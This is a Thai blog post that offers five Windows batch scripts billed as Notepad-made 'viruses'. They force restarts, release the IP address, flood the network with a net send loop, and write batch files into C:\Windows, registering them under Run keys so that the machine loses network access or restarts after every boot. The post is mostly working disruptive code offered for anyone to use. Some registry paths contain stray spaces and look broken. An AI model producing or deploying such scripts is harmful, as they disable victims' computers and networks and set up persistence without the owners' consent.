วันอาทิตย์ที่ 13 มีนาคม พ.ศ. 2554

มีสาระ......ลองของสร้างไวรัสจากNotepad ฉบับ"เด็กน้อย"

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใด ๆ ทั้งสิ้น

Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t 0

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ตชั่วขณะ

Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release

Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

--ระดับรุนแรง ( มาก )--

Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก 

Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE

Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)

code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

0 ความคิดเห็น:

แสดงความคิดเห็น

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More